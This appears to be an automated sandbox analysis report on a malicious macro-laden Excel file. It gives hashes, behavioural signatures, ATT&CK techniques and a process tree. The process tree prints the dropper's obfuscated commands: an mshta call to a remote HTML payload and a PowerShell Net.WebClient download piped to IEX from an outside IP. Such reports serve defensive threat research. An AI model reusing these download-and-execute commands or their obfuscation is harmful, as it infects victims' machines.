8f1c5f756658a90d9007b111594547d054cfdb487aefa255156d07fddd7ee016

General

Target

lrnqyof0626260.xlsm
Size

115KB
MD5

d0dfa995eb72c89052f341457554b904
SHA1

02bb89c9e8c012c33ff10213e785dfc74bd048f2
SHA256

8f1c5f756658a90d9007b111594547d054cfdb487aefa255156d07fddd7ee016
SHA512

0c78486c70d5ec5e8808d89f9d48a55f0938e4424a18857cb76532e54821757f458ccb670543f986d97a880a87309da190b24eadc2ef890fc7c2de12244b1a9f

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://92.255.57.195/sec/se1.png

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1512	1304	cmd.exe	51

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3100 created 2208	3100	WerFault.exe	63

Blocklisted process makes network request 1 IoCs

flow	pid	Process
30	2208	mshta.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3848	2208	WerFault.exe	63

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1304	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1304 wrote to memory of 536	1304	EXCEL.EXE	59
PID 1304 wrote to memory of 536	1304	EXCEL.EXE	59
PID 1304 wrote to memory of 1512	1304	EXCEL.EXE	61
PID 1304 wrote to memory of 1512	1304	EXCEL.EXE	61
PID 1512 wrote to memory of 2208	1512	cmd.exe	63
PID 1512 wrote to memory of 2208	1512	cmd.exe	63
PID 2208 wrote to memory of 3184	2208	mshta.exe	66
PID 2208 wrote to memory of 3184	2208	mshta.exe	66
PID 3100 wrote to memory of 2208	3100	WerFault.exe	63
PID 3100 wrote to memory of 2208	3100	WerFault.exe	63

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\lrnqyof0626260.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:536
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Windows\system32\mshta.exe
    mshta http://0x5cff39c3/sec/se1.html
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
      4⤵
      PID:3184
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2208 -s 1724
      4⤵
      Program crash
      PID:3848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
1⤵
PID:3704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow
1⤵
PID:548

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 2208 -ip 2208
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3100

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1304-130-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1304-134-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1304-133-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1304-132-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1304-131-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1304-137-0x00007FF7D13B0000-0x00007FF7D13C0000-memory.dmp

Filesize
64KB

Download
memory/1304-138-0x00007FF7D13B0000-0x00007FF7D13C0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads